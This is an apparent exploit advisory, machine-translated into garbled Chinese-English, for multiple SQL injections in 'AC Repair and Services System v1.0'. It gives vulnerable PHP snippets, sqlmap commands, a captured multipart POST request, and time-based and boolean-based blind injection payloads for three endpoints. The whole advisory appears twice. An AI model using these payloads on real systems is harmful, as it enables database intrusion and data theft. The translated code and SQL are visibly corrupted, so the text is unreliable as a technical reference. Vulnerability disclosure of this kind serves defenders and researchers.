#利用标题:交流维修和服务系统v1.0-多个SQL注入
#DATE: 2023年12月27日
#利用作者: Gnanaraj Mauviel(@0xm3m)
#vendor: oretnom23
#供应商homepage3360 https://www.sourcecodester.com/php/...ysql-source-code-code-code-free-download.html
#软件link: https://www.sourcecodester.com/sites/default/files/files/download/oretnom23/php-acrss.zip
#版本: V1.0
#在: Mac OSX,XAMPP,Apache,MySQL上测试
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
源代码(/php-acrss/admin/user/manage_user.php):
php
if(isset($ _ get ['id'])){
$ user=$ conn-Query('select *从用户中的id='{$ _ get ['id']}'');
foreach($ user-fetch_array()为$ k=$ v){
$ meta [$ k]=$ v;
}
}
?
-sqlmap -u'http://localhost/php -acrss/admin/?page=user/manage_userid=' - batch
---
参数: ID(GET)
Type:基于时间的盲人
title: mysql=5.0.12和基于时间的盲人(查询睡眠)
payload: page=user/manage_userid='and(从(select(Sleep(5))hicz选择5500)和'rzis'='rzis
---
源代码(/php-acrss/classes/master.php):
函数delete_inquiry(){
提取($ _ post);
$ del=$ this-conn-Query('delete fref从
如果($ del){
$ resp ['status']='成功';
$ this-settings-set_flashdata('成功','询问成功删除。');
}别的{
$ resp ['status']='失败';
$ resp ['error']=$ this-conn-error;
}
返回JSON_ENCODE($ resp);
}
-sqlmap -u'http://localhost/php -acrss/class/class/master.php?f=delete_inquiry' - data='id=*' - batch
---
参数:#1*((自定义)帖子)
Type:基于时间的盲人
title: mysql=5.0.12和基于时间的盲人(查询睡眠)
PAYLOAD: ID='和(Select 7930从(Select(Sleep(5)))XWLG)和'jimw'='jimw
---
源代码(/php-acrss/classes/users.php):
$ qry=$ this-conn-Query('Update用户设置$ data WHEW id={$ id}');
如果($ qry){
$ this-settings-set_flashdata('Success',“用户详细信息成功更新”);
foreach($ _ post as $ k=$ v){
如果($ k!='id'){
if(!empty($ data))$ data。=',';
if($ this-settings-userdata('id')==$ id)
$ this-settings-set_userdata($ k,$ v);
}
}
post/php-acrss/classes/users.php?f=save http/1.1
HOST: LOCALHOST
内容长度: 943
sec-ch-ua:'not_a brand'; v='8','chromium'; v='120'
ACCEPT: /
content-type:多部分/form-data;边界=--- WebKitformBoundaryAutgvsswijifz27g
X-重新要求- WITH: XMLHTTPREQUEST
sec-ch-ua-mobile:0
用户- 代理: Mozilla/5.0(Windows NT 10.0; Win64; X64)AppleWebkit/537.36(Khtml,像Gecko一样)Chrome/120.0.6099.71 Safari/537.36
sec-ch-ua-platform:'macos'
Origin: http://localhost
sec-fetch-site:相同原产
sec-fetch mode: cors
sec-fetch-Dest:空
Referer: http://localhost/php-acrss/admin/?page=user/manage_userid=9
Accept-incoding: Gzip,Deflate,br
Accept-Language: en-gb,en-us; q=0.9,en; q=0.8
cookie: phpsessID=O92N8NATI3696KG69PLIDV5E77
连接:关闭
------ webkitformboundaryautgvsswijifz27g
content-disposition: form-data;名称='id'
9
------ webkitformboundaryautgvsswijifz27g
content-disposition: form-data;名称='firstName'
克莱尔
------ webkitformboundaryautgvsswijifz27g
content-disposition: form-data; name='middlename'
------ webkitformboundaryautgvsswijifz27g
content-disposition: form-data;名称='lastname'
布雷克
------ webkitformboundaryautgvsswijifz27g
content-disposition: form-data;名称='用户名'
cblake
------ webkitformboundaryautgvsswijifz27g
content-disposition: form-data;名称='密码'
------ webkitformboundaryautgvsswijifz27g
content-disposition: form-data;名称='类型'
2
------ webkitformboundaryautgvsswijifz27g
content-disposition: form-data;名称='img';文件名=''
content-type:应用程序/钟表流
------ webkitformboundaryautgvsswijifz27g--
-sqlmap -r〜/documents/post -localhost.txt -batch
---
参数:多部分ID((自定义)帖子)
Type:基于布尔的盲人
title:基于布尔的盲人- 参数替换(原始值)
PAYLOAD: ----------- webkitformboundaryautgvsswijifz27g
content-disposition: form-data;名称='id'
(选择(当(3947=3947)的情况下,然后9 else(选择2252 UNION SELECT 2638)END))))
------ webkitformboundaryautgvsswijifz27g
content-disposition: form-data;名称='firstName'
克莱尔
------ webkitformboundaryautgvsswijifz27g
content-disposition: form-data; name='middlename'
------ webkitformboundaryautgvsswijifz27g
content-disposition: form-data;名称='lastname'
布雷克
------ webkitformboundaryautgvsswijifz27g
content-disposition: form-data;名称='用户名'
cblake
------ webkitformboundaryautgvsswijifz27g
content-disposition: form-data;名称='密码'
------ webkitformboundaryautgvsswijifz27g
content-disposition: form-data;名称='类型'
2
------ webkitformboundaryautgvsswijifz27g
content-disposition: form-data;名称='img';文件名=''
content-type:应用程序/钟表流
------ webkitformboundaryautgvsswijifz27g--
Type:基于时间的盲人
title: mysql=5.0.12和基于时间的盲人(查询睡眠)
PAYLOAD: ----------- webkitformboundaryautgvsswijifz27g
content-disposition: form-data;名称='id'
9和(从(select(sleep(5)))pifo中选择7168)
------ webkitformboundaryautgvsswijifz27g
content-disposition: form-data;名称='firstName'
克莱尔
------ webkitformboundaryautgvsswijifz27g
content-disposition: form-data; name='middlename'
------ webkitformboundaryautgvsswijifz27g
content-disposition: form-data;名称='lastname'
布雷克
------ webkitformboundaryautgvsswijifz27g
content-disposition: form-data;名称='用户名'
cblake
------ webkitformboundaryautgvsswijifz27g
content-disposition: form-data;名称='密码'
------ webkitformboundaryautgvsswijifz27g
content-disposition: form-data;名称='类型'
2
------ webkitformboundaryautgvsswijifz27g
content-disposition: form-data;名称='img';文件名=''
content-type:应用程序/钟表流
------ webkitformboundaryautgvsswijifz27g--
---
#DATE: 2023年12月27日
#利用作者: Gnanaraj Mauviel(@0xm3m)
#vendor: oretnom23
#供应商homepage3360 https://www.sourcecodester.com/php/...ysql-source-code-code-code-free-download.html
#软件link: https://www.sourcecodester.com/sites/default/files/files/download/oretnom23/php-acrss.zip
#版本: V1.0
#在: Mac OSX,XAMPP,Apache,MySQL上测试
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
源代码(/php-acrss/admin/user/manage_user.php):
php
if(isset($ _ get ['id'])){
$ user=$ conn-Query('select *从用户中的id='{$ _ get ['id']}'');
foreach($ user-fetch_array()为$ k=$ v){
$ meta [$ k]=$ v;
}
}
?
-sqlmap -u'http://localhost/php -acrss/admin/?page=user/manage_userid=' - batch
---
参数: ID(GET)
Type:基于时间的盲人
title: mysql=5.0.12和基于时间的盲人(查询睡眠)
payload: page=user/manage_userid='and(从(select(Sleep(5))hicz选择5500)和'rzis'='rzis
---
源代码(/php-acrss/classes/master.php):
函数delete_inquiry(){
提取($ _ post);
$ del=$ this-conn-Query('delete fref从
iqueiry_list whene id='{$ id}'');如果($ del){
$ resp ['status']='成功';
$ this-settings-set_flashdata('成功','询问成功删除。');
}别的{
$ resp ['status']='失败';
$ resp ['error']=$ this-conn-error;
}
返回JSON_ENCODE($ resp);
}
-sqlmap -u'http://localhost/php -acrss/class/class/master.php?f=delete_inquiry' - data='id=*' - batch
---
参数:#1*((自定义)帖子)
Type:基于时间的盲人
title: mysql=5.0.12和基于时间的盲人(查询睡眠)
PAYLOAD: ID='和(Select 7930从(Select(Sleep(5)))XWLG)和'jimw'='jimw
---
源代码(/php-acrss/classes/users.php):
$ qry=$ this-conn-Query('Update用户设置$ data WHEW id={$ id}');
如果($ qry){
$ this-settings-set_flashdata('Success',“用户详细信息成功更新”);
foreach($ _ post as $ k=$ v){
如果($ k!='id'){
if(!empty($ data))$ data。=',';
if($ this-settings-userdata('id')==$ id)
$ this-settings-set_userdata($ k,$ v);
}
}
post/php-acrss/classes/users.php?f=save http/1.1
HOST: LOCALHOST
内容长度: 943
sec-ch-ua:'not_a brand'; v='8','chromium'; v='120'
ACCEPT: /
content-type:多部分/form-data;边界=--- WebKitformBoundaryAutgvsswijifz27g
X-重新要求- WITH: XMLHTTPREQUEST
sec-ch-ua-mobile:0
用户- 代理: Mozilla/5.0(Windows NT 10.0; Win64; X64)AppleWebkit/537.36(Khtml,像Gecko一样)Chrome/120.0.6099.71 Safari/537.36
sec-ch-ua-platform:'macos'
Origin: http://localhost
sec-fetch-site:相同原产
sec-fetch mode: cors
sec-fetch-Dest:空
Referer: http://localhost/php-acrss/admin/?page=user/manage_userid=9
Accept-incoding: Gzip,Deflate,br
Accept-Language: en-gb,en-us; q=0.9,en; q=0.8
cookie: phpsessID=O92N8NATI3696KG69PLIDV5E77
连接:关闭
------ webkitformboundaryautgvsswijifz27g
content-disposition: form-data;名称='id'
9
------ webkitformboundaryautgvsswijifz27g
content-disposition: form-data;名称='firstName'
克莱尔
------ webkitformboundaryautgvsswijifz27g
content-disposition: form-data; name='middlename'
------ webkitformboundaryautgvsswijifz27g
content-disposition: form-data;名称='lastname'
布雷克
------ webkitformboundaryautgvsswijifz27g
content-disposition: form-data;名称='用户名'
cblake
------ webkitformboundaryautgvsswijifz27g
content-disposition: form-data;名称='密码'
------ webkitformboundaryautgvsswijifz27g
content-disposition: form-data;名称='类型'
2
------ webkitformboundaryautgvsswijifz27g
content-disposition: form-data;名称='img';文件名=''
content-type:应用程序/钟表流
------ webkitformboundaryautgvsswijifz27g--
-sqlmap -r〜/documents/post -localhost.txt -batch
---
参数:多部分ID((自定义)帖子)
Type:基于布尔的盲人
title:基于布尔的盲人- 参数替换(原始值)
PAYLOAD: ----------- webkitformboundaryautgvsswijifz27g
content-disposition: form-data;名称='id'
(选择(当(3947=3947)的情况下,然后9 else(选择2252 UNION SELECT 2638)END))))
------ webkitformboundaryautgvsswijifz27g
content-disposition: form-data;名称='firstName'
克莱尔
------ webkitformboundaryautgvsswijifz27g
content-disposition: form-data; name='middlename'
------ webkitformboundaryautgvsswijifz27g
content-disposition: form-data;名称='lastname'
布雷克
------ webkitformboundaryautgvsswijifz27g
content-disposition: form-data;名称='用户名'
cblake
------ webkitformboundaryautgvsswijifz27g
content-disposition: form-data;名称='密码'
------ webkitformboundaryautgvsswijifz27g
content-disposition: form-data;名称='类型'
2
------ webkitformboundaryautgvsswijifz27g
content-disposition: form-data;名称='img';文件名=''
content-type:应用程序/钟表流
------ webkitformboundaryautgvsswijifz27g--
Type:基于时间的盲人
title: mysql=5.0.12和基于时间的盲人(查询睡眠)
PAYLOAD: ----------- webkitformboundaryautgvsswijifz27g
content-disposition: form-data;名称='id'
9和(从(select(sleep(5)))pifo中选择7168)
------ webkitformboundaryautgvsswijifz27g
content-disposition: form-data;名称='firstName'
克莱尔
------ webkitformboundaryautgvsswijifz27g
content-disposition: form-data; name='middlename'
------ webkitformboundaryautgvsswijifz27g
content-disposition: form-data;名称='lastname'
布雷克
------ webkitformboundaryautgvsswijifz27g
content-disposition: form-data;名称='用户名'
cblake
------ webkitformboundaryautgvsswijifz27g
content-disposition: form-data;名称='密码'
------ webkitformboundaryautgvsswijifz27g
content-disposition: form-data;名称='类型'
2
------ webkitformboundaryautgvsswijifz27g
content-disposition: form-data;名称='img';文件名=''
content-type:应用程序/钟表流
------ webkitformboundaryautgvsswijifz27g--
---